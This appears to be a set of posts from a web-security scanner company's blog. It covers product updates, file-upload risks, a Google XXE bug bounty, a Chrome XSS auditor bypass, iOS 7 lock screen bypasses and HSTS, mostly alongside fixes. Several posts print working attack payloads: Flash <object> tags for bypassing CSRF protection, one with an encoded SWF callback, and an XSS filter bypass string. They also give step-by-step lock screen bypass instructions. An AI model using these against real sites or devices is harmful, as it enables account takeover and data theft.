Major updates to Detectify

We are releasing multiple major changes to Detectify, and this marks the beginning of the new Detectify. Many hours have been invested in a new and improved UI, and there are also multiple changes under the hood in the core of the service, e.g., an updated engine that better handles JS-based pages.

New user interface

The ambition with the new UI is to create a flexible design where it is easier for us to introduce new functionality to our users. The release plan is packed with features that will help you as a developer and security tester.

We have introduced new features for improved usability, e.g.,

  • Scanning behind login and testing of predefined user flows (e.g., check-out flows)

  • An API for you to build integrations into your development tools

Improved coverage of new and updated attack vectors

New and updated modules for vulnerability testing in this release include CSRF (testing of forms), SSL BREACH, Flash content sniffing (Rosetta Flash), DNS SPF (spoofing the sender of e-mails), DNSSEC tests, a CSS parser and, for all of you with internal legacy systems, VBS. An update of our JS engine brings improved coverage of DOM-based XSS.

Set up recurring testing

Don’t forget to set up recurring scanning of your site to make sure you are always tested for new security issues. New attack vectors are constantly being identified and we release new versions of the scanner frequently.


Do you feel that something is missing from Detectify, or have a general comment? Hit us up at @detectify or general@detectify.com. We are aiming to improve Detectify and make the Internet a safer place.

Happy scanning!


The pitfalls of allowing file uploads on your website

These days a lot of websites allow users to upload files, but many are unaware of the pitfalls of letting users (potential attackers) upload files, even valid files.

What’s a valid file? Usually, a restriction would be on two parameters:

  • The uploaded file extension
  • The uploaded Content-Type

For example, the web application could check that the extension is “jpg” and the Content-Type “image/jpeg” to make sure it’s impossible to upload malicious files. Right?
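
To make that concrete, here is a minimal sketch (Python/Flask, with a hypothetical route and field name) of the kind of extension and Content-Type check described above; as the rest of this post shows, it is not enough on its own:

from flask import Flask, request, abort
from werkzeug.utils import secure_filename

app = Flask(__name__)

@app.route("/upload", methods=["POST"])
def upload():
    picture = request.files.get("picture")
    if picture is None:
        abort(400)
    if not picture.filename.lower().endswith(".jpg"):
        abort(400)  # the extension looks right...
    if picture.mimetype != "image/jpeg":
        abort(400)  # ...and so does the Content-Type
    # ...but the bytes themselves could still be a perfectly valid SWF file.
    picture.save("/tmp/" + secure_filename(picture.filename))
    return "ok"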

The problem is that plugins like Flash don’t care about the extension or the Content-Type. If a file is embedded using an <object> tag, it will be executed as a Flash file as long as the content of the file looks like a valid Flash file.

But wait a minute! Shouldn’t the Flash be executed within the domain that embeds the file using the <object> tag? Yes and no. If a Flash file (bogus image file) is uploaded on victim.com and then embedded at attacker.com, the Flash file can execute JavaScript within the domain of attacker.com. However, the requests the Flash file sends are made within the security context of victim.com, so it is allowed to read responses from victim.com.

This basically means that if a website allows file uploads without validating the content of the file, an attacker can bypass any CSRF protection on the website.

The attack

Based on these facts we can create an attack scenario like this:

  1. An attacker creates a malicious Flash (SWF) file
  2. The attacker changes the file extension to JPG
  3. The attacker uploads the file to victim.com
  4. The attacker embeds the file on attacker.com using an <object> tag with type “application/x-shockwave-flash”
  5. The victim visits attacker.com, which loads the file embedded with the <object> tag
  6. The attacker can now send and receive arbitrary requests to victim.com using the victim’s session
  7. The attacker sends a request to victim.com and extracts the CSRF token from the response

A payload could look like this:

<object style="height:1px;width:1px;" data="http://victim.com/user/2292/profilepicture.jpg" type="application/x-shockwave-flash" allowscriptaccess="always" flashvars="c=read&u=http://victim.com/secret_file.txt"></object>

The fix

The good news is that there’s a fairly easy way to prevent Flash from doing this. Flash won’t execute the file if the server serves it with a Content-Disposition header like so:

Content-Disposition: attachment; filename="image.jpg"

So if you allow file uploads or print arbitrary user data in your service, you should always verify the contents as well as send a Content-Disposition header where applicable.
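
As an illustration, here is a minimal sketch (Python/Flask, with a hypothetical upload directory and route) of serving uploaded files with such a header, so that plugins like Flash treat them as downloads instead of executing them:

from flask import Flask, send_from_directory

app = Flask(__name__)
UPLOAD_DIR = "/var/www/uploads"  # assumption: wherever your uploads are stored

@app.route("/uploads/<path:name>")
def serve_upload(name):
    # as_attachment=True makes Flask send
    # Content-Disposition: attachment; filename="<name>"
    return send_from_directory(UPLOAD_DIR, name, as_attachment=True)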

Another way to remediate issues like this is to host the uploaded files on a separate domain (like websiteusercontent.com).

Other uses

But the fun doesn’t stop at file uploads! Since the only requirement of this attack is that the attacker can control the data at a location on the target domain (regardless of Content-Type), there’s more than one way to perform it.

One way would be to abuse a JSONP API. Usually, the attacker can control the output of a JSONP API endpoint by changing the callback parameter. However, if an attacker uses an entire Flash file as the callback name, it can be used just like an uploaded file in this attack. A payload could look like this:

<object style="height:1px;width:1px;" data="http://victim.com/user/jsonp?callback=CWS%07%0E000x%9C%3D%8D1N%C3%40%10E%DF%AE%8D%BDI%08%29%D3%40%1D%A0%A2%05%09%11%89HiP%22%05D%8BF%8E%0BG%26%1B%D9%8E%117%A0%A2%DC%82%8A%1Br%04X%3B%21S%8C%FE%CC%9B%F9%FF%AA%CB7Jq%AF%7F%ED%F2%2E%F8%01%3E%9E%18p%C9c%9Al%8B%ACzG%F2%DC%BEM%EC%ABdkj%1E%AC%2C%9F%A5%28%B1%EB%89T%C2Jj%29%93%22%DBT7%24%9C%8FH%CBD6%29%A3%0Bx%29%AC%AD%D8%92%FB%1F%5C%07C%AC%7C%80Q%A7Nc%F4b%E8%FA%98%20b%5F%26%1C%9F5%20h%F1%D1g%0F%14%C1%0A%5Ds%8D%8B0Q%A8L%3C%9B6%D4L%BD%5F%A8w%7E%9D%5B%17%F3%2F%5B%DCm%7B%EF%CB%EF%E6%8D%3An%2D%FB%B3%C3%DD%2E%E3d1d%EC%C7%3F6%CD0%09" type="application/x-shockwave-flash" allowscriptaccess="always" flashvars="c=alert&u=http://victim.com/secret_file.txt"></object>
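
On the defense side, validating the callback name against a strict whitelist pattern closes this hole. A minimal sketch (Python/Flask, with a hypothetical endpoint, not any particular site’s API) could look like this:

import json
import re

from flask import Flask, request, abort

app = Flask(__name__)

# Only allow plain (optionally dotted) function names, nothing that could
# double as a Flash file or other active content.
CALLBACK_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_.]{0,63}$")

@app.route("/user/jsonp")
def jsonp():
    callback = request.args.get("callback", "callback")
    if not CALLBACK_RE.match(callback):
        abort(400)
    payload = json.dumps({"user": "example"})
    body = "%s(%s);" % (callback, payload)
    return app.response_class(body, mimetype="application/javascript")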

tl;dr: Send Content-Disposition headers for uploaded files and validate your JSONP callback names, or put the uploaded files on a separate domain.

And like always, if you want to know if your website has issues like these, try a Detectify scan!

That’s it for now.

Written by: Mathias, Frans


How we got read access on Google’s production servers

To stay on top of the latest security alerts we often spend time on bug bounties and CTFs. When we were discussing the challenge for the weekend, Mathias got an interesting idea: what target can we use against itself?

Of course. The Google search engine!

What could be better than scanning Google for bugs using the search engine itself? And what kind of software tends to contain the most vulnerabilities?

  • Old and deprecated software
  • Unknown and hardly accessible software
  • Proprietary software that only a few people have access to
  • Alpha/Beta releases and otherwise new technologies (software in the early stages of its lifetime)

For you bounty hunters, here’s a tip: Google Dork

By combining one thing with another, we started Google dorking our way through acquisitions and products, looking for antique systems without any noticeable number of users.

One system caught our eye: the Google Toolbar button gallery. We looked at each other and jokingly said “this looks vuln!”, not knowing how right we were.

Not two minutes later we noticed that the gallery provides users with the ability to customize their toolbar with new buttons. If you’re a developer, you’re also able to create your own buttons by uploading XML files containing various metadata (styling and such).

Fredrik read through the API specifications and crafted his own button containing fishy XML entities. The plan was to conduct an XXE attack, as he had noticed that the title and description fields were printed out when searching for the buttons.

The root cause of XXE vulnerabilities is naive XML parsers that blindly interpret the DTD of user-supplied XML documents. By doing so, you risk having your parser do a bunch of nasty things. Some of the issues are local file access, SSRF and remote file inclusion, denial of service and possibly remote code execution. If you want to know how to patch these issues, check out the OWASP page on how to secure XML parsers in various languages and platforms.
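
As one example of what that hardening can look like, here is a minimal sketch in Python with lxml (Google’s actual stack is of course unknown to us; this is just an illustration of the idea):

from lxml import etree

def parse_untrusted_xml(data):
    # Refuse to expand entities, load DTDs or touch the network while
    # parsing, which makes XXE payloads like the one described here fizzle.
    parser = etree.XMLParser(
        resolve_entities=False,
        load_dtd=False,
        no_network=True,
    )
    return etree.fromstring(data, parser)

# A document referencing /etc/passwd via an external entity now parses
# without that entity ever being fetched or expanded.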

Nevertheless, the file got uploaded… and behold! First try: /etc/passwd

Second try (for verification purposes): /etc/hosts

Boom goes the dynamite.

What we got back was the /etc/passwd and the /etc/hosts of one of Google’s production servers. Our payloads served as a proof of concept to demonstrate the impact. We could just as well have tried to access any other file on their server, or moved on to SSRF exploitation in order to reach internal systems. To say the least, that’s pretty bad.

We contacted Google straight away while popping open some celebration beers. After 20 minutes we got a reply from Thai on the Google Security Team. They were impressed. We exchanged a few emails on the details back and forth over the following days. In our correspondence we asked how much the vulnerability was worth. This is what we received as a reply: the XXE meme.

The bottles (or whatever it is that falls out) turned out to be worth $10,000, enough to cover a road trip through Europe.

tl;dr: We uploaded a malicious XML to one of Google’s servers. Turned out to be a major XXE issue. Google financed an awesome road trip for the team.

Thanks for reading.

Written by: Fredrik
Co-Author: Mathias

If Google can get hacked, are you sure your service is secure? Try Detectify here and see for yourself.


Chrome XSS Protection Bypass (using Rails)

What is the Chrome XSS protection?
The Chrome XSS Protection (also known as XSS auditor) checks whether a script that’s about to run on a web page is also present in the request that fetched that web page. If the script is present in the request, that’s a strong indication that the web server might have been tricked into reflecting the script. So in short, it blocks reflected XSS attacks.

A couple of months ago I discovered that the Chrome XSS protection could be bypassed in Rails. Later, when I saw the issue brought up on Twitter by homakov, I figured I’d write something about it as well. Here’s how the testing went down:

First try
First off, we created a dummy script with a straightforward XSS scenario. Here’s the code:

<h1>Variable: <%= raw params[:variable] %></h1>

Let’s test it with a basic cross-site scripting payload:

GET /?variable=<script>alert(1)</script> HTTP/1.1
<h1>Variable: <script>alert(1)</script></h1>

Oh, no! The XSS auditor blocked the attempt. Let’s try something a bit different!

The bypass

GET /?variable[<script>]=*alert(1)</script> HTTP/1.1
<h1>Variable: {"<script>"=>"*alert(1)</script>"}</h1>

It works! But why? Let’s have a closer look at the source code and strip away everything except the <script> tag:

<script>"=>" * alert(1)</script>

Okay, that’s a bit clearer. The asterisk acts as a multiplication of whatever is on either side, so the JavaScript will try to multiply the string “=>” with whatever the function alert() returns. Since alert doesn’t return anything, the right-hand value will be undefined and the final result of the calculation will be NaN.

The XSS auditor probably misses this because Rails doesn’t print exactly what the browser sent, making it hard to filter automatically. However, Internet Explorer’s XSS filter, as well as NoScript, catches it.

TL;DR: Chrome’s XSS auditor can be bypassed with Rails like so: ?variable[<script>]=*alert(1)</script>.

Want to try the world’s cheapest web security scanner? Sign up here.
Written by: Mathias Karlsson


Detectify Responsible Disclosure Program

As of today, researchers can report security issues in Detectify services to earn a spot on our Hall of Fame as well as some cool prizes. The Detectify team has participated in most responsible disclosure programs out there, and we felt the time had come to have one of our own.

But our service is made for finding web vulnerabilities, so why do we need a disclosure program? Well, even though our services are based around finding security bugs in web applications, we are not so naive as to think that our own applications are 100% flawless. We take security issues seriously and will respond swiftly to fix verifiable security issues. If you are the first to report a verifiable security issue, we’ll thank you with some cool stuff and a place on our Hall of Fame page.

So how does the reporting process work? It’s a five-step process:

  • A researcher sends a mail using the correct template to disclosure@detectify.com
  • The researcher will get an automatic response confirming that we have received the issue
  • A support case is automatically created
  • The person assigned to the support case responds to the researcher, verifying the issue
  • The issue is patched and the researcher is showered in eternal glory

What bugs are eligible? Any typical web security bugs such as:

  • Cross-site Scripting
  • Open redirect
  • Cross-site request forgery
  • File inclusion
  • Authentication bypass
  • Server-side code execution

What bugs are NOT eligible? Any typically low-impact or overly complex issues, such as:

  • Missing Cookie flags on non-session cookies or 3rd party cookies
  • Logout CSRF
  • Social engineering
  • Denial of service
  • SSL BEAST/CRIME/etc

So what are you waiting for?

Sign up for Detectify here.


Another iOS 7 Lock Screen bypass – Control Center turned off

In our previous post we covered a bug, disclosed yesterday, that lets anyone break into a phone running iOS 7.

We also wrote about some additional ways to trigger the bug, but all variants could be prevented by shutting off the Control Center on the lock screen. So that’s what we, and everyone else, suggested.

However, we have discovered that this does not, in fact, prevent a similar bug from exploiting the lock screen. The new variant is based on the fact that Voice Control/Siri can make phone calls to known contacts, and by using the shutdown screen while calling, the double-tap trick can still be performed.


And here’s the aftermath: https://twitter.com/avlidienbrunn/status/381099165213683712.

Currently we have no suggested patch/fix for this issue.

Written by Mathias/Frans


iOS 7 lock screen bypass write-up

Yesterday a researcher named Jose Rodriguez published a way to bypass the lock screen on the new iOS 7. Naturally, we at Detectify checked it out and played a bit with the bug.

Reproduction
• Make sure the camera app is running. This can be achieved by either using the control center, or swiping the bottom right corner on the main lock screen.
• Enter the control center (swipe the bottom center on the main lock screen)
• Open the timer app, in the bottom left corner next to the flashlight app
• Hold down the power button
• Press cancel
• Between the shutdown screen and the timer app, double tap the home button and hold down the second click for around half a second
• Swipe to the camera app

If you did everything correctly, you can now access the gallery and everything inside, which includes sending mail, using Twitter and sending text messages.

Other ways to trigger the bug
We also discovered that this bug can be triggered in some other ways. For one, it can be triggered not only from the timer app but also from the calculator app. Another way is to use Siri/Voice Control instead of the shutdown screen; then you can apply the same “magic double tap” between Siri/Voice Control and the calculator app.

(Outcome: https://twitter.com/avlidienbrunn/status/381020433929101312)

Temporary fix
So what can we do to protect ourselves until Apple releases a patch for this bug? You can shut off access to the Control Center while the phone is locked by going to Settings -> Control Center and disabling Access on Lock Screen.

Written by: Mathias


Server-side JavaScript Injections and more!

Today’s update fills the needs of many of you out there! You asked for it, and now it’s in the Detectify engine! Here’s a breakdown of the stuff we’ve put in:

Verify your domain with Google Analytics

Having trouble editing your code? Don’t want to upload files? No problem! You can now verify the ownership of your domain using your Google Analytics account. Try it out in the dashboard or during sign-up!

National Vulnerability Database

Our fingerprinting has been extended using the U.S. National Vulnerability Database. Detectify will now test for known vulnerabilities based on the versions we fingerprint on your domain, and warn you when there’s a security issue in the version you’re using.

Server-Side JavaScript Injections

We now have a feature for pentesting server-side JavaScript. That means we are able to find NoSQL injections in MongoDB, code execution flaws in Node.js and other flaws in exotic server-side JS technologies.
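
For readers curious what this class of flaw looks like, here is an illustrative sketch in Python/Flask with pymongo (hypothetical route, database and collection names, and not how Detectify tests for it internally); the same pattern applies to Node.js code that passes request bodies straight into MongoDB queries:

from flask import Flask, request, jsonify
from pymongo import MongoClient

app = Flask(__name__)
users = MongoClient()["app"]["users"]  # hypothetical database and collection

@app.route("/login", methods=["POST"])
def login():
    creds = request.get_json() or {}
    username = creds.get("username")
    password = creds.get("password")
    # Without this check, sending {"password": {"$gt": ""}} would turn the
    # query below into "password greater than empty string", i.e. it would
    # match any password: a classic MongoDB NoSQL injection.
    if not isinstance(username, str) or not isinstance(password, str):
        return jsonify(ok=False), 400
    # (Password hashing omitted for brevity; this only illustrates the
    # injection issue.)
    user = users.find_one({"username": username, "password": password})
    return jsonify(ok=user is not None)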

Content-Security-Policy

Our site at detectify.com now sends a Content-Security-Policy header. Content-Security-Policy is a security header that allows website owners to declare which sources the browser may load content from. Read more about Content Security Policy here.
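
If you want to try it on your own site, a minimal sketch (Python/Flask; the policy shown is only an example, not the one detectify.com sends) could look like this:

from flask import Flask

app = Flask(__name__)

@app.after_request
def add_csp(response):
    # Example policy only: adjust the sources to what your site actually loads.
    response.headers["Content-Security-Policy"] = (
        "default-src 'self'; "
        "script-src 'self' https://cdn.example.com; "
        "img-src 'self' data:"
    )
    return response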

Download report

Yes, we finally added support for downloading your reports as PDF files, conveniently making them accessible offline. The design of the PDF reports is still a work in progress, so if you have any issues or suggestions, feel free to mail us at hello@detectify.com!

Sign up


HTTP Strict Transport Security (HSTS)

HTTP Strict Transport Security, or just HSTS, is a security mechanism for websites and browsers. HSTS is used when a web server wants to tell its clients that they should only use HTTPS, and not HTTP.

This mechanism is useful because loads and loads of websites have a lazy encryption discipline: while most of the website is loaded over HTTPS, some resources, such as JavaScript, plugin resources and images, are loaded over plain HTTP. This is horrendous. Using HTTPS is nearly pointless if there are resources on the website that are loaded over plain HTTP, since the session cookies will be sent with every request, including the plain HTTP ones. This may lead to session hijacking (unless, of course, the cookies have been flagged as “Secure”).
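
Flagging session cookies as Secure is a one-line change in most frameworks; a minimal sketch (Python/Flask, with a hypothetical cookie name and value) might look like this:

from flask import Flask, make_response

app = Flask(__name__)

@app.route("/login")
def login():
    response = make_response("logged in")
    # Secure: never send the cookie over plain HTTP.
    # HttpOnly: keep it out of reach of JavaScript as well.
    response.set_cookie("session", "abc123", secure=True, httponly=True)
    return response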

HSTS is initiated by the server through its Strict-Transport-Security header, which also specifies how long it takes before the policy expires. After that, the browser considers the website non-HSTS unless another HSTS header is received.
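
As an example, here is a minimal Python/Flask sketch that sends the header with a one-year max-age (the value and includeSubDomains are assumptions; pick what suits your site):

from flask import Flask

app = Flask(__name__)

@app.after_request
def add_hsts(response):
    # Resulting header: Strict-Transport-Security: max-age=31536000; includeSubDomains
    # i.e. cache the policy for one year and apply it to subdomains too.
    response.headers["Strict-Transport-Security"] = (
        "max-age=31536000; includeSubDomains"
    )
    return response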

Picture a classic man-in-the-middle scenario: Alice browses a website over a network where an attacker, Eve, can intercept her traffic. If Alice had been using Firefox or Chrome, which both have a preloaded list of websites employing HSTS, she would have been a lot better off (given that the website was using HSTS and was included in the preloaded HSTS list): everything would have been transferred over HTTPS. This is a nice way to prevent SSL stripping attacks. SSL stripping is a method that lets the attacker conduct a man-in-the-middle attack unencrypted, by moving the SSL “end point” from the user (Alice) to the man in the middle (Eve), while the traffic between Eve and the web server stays encrypted. This way, the web server thinks everything is okay, and Alice has no idea that the traffic is supposed to be encrypted, unless the web server uses HSTS. If HSTS is used, Alice’s browser knows that the traffic is supposed to be encrypted, and can therefore determine that something fishy is going on when it isn’t.

If you feel like going more in-depth, you can read RFC 6797 on the IETF website, or if you wish to implement HSTS on your own website, check out this OWASP page on the subject.

Do you care about security? Try Detectify!

Written by: Håkon Vågsether.


Performance boost, new verification methods and custom paths

Today’s update is a big one! Mostly behind-the-scenes updates, but you are also going to notice some things that we hope you’ll appreciate!

Performance boost

We have implemented a new HTML parser which makes the scans much faster. For bigger sites, even hours faster: we’ve seen scan times go from 14 hours down to 2.

Not only are we scanning faster, the new HTML parser is also easier to work with, which will make our development easier and faster and allow us to keep the scanner even more up to date.

New verification methods

People have asked us for more ways to verify the ownership of their website that don’t involve the web server or code. For that we have added CNAME and TXT verification, which only require DNS settings.

Add a CNAME record for a subdomain with the right target, or add a TXT record, and you are good to go!

Custom paths

If you have a hidden path robots can’t find (maybe an admin panel at a hidden location?), you can now tell our scanner where it is.

We have also added a blacklist for paths you don’t want us to scan.

Other than that, we now have a new front page, so be sure to check it out!

Let us know what you think!
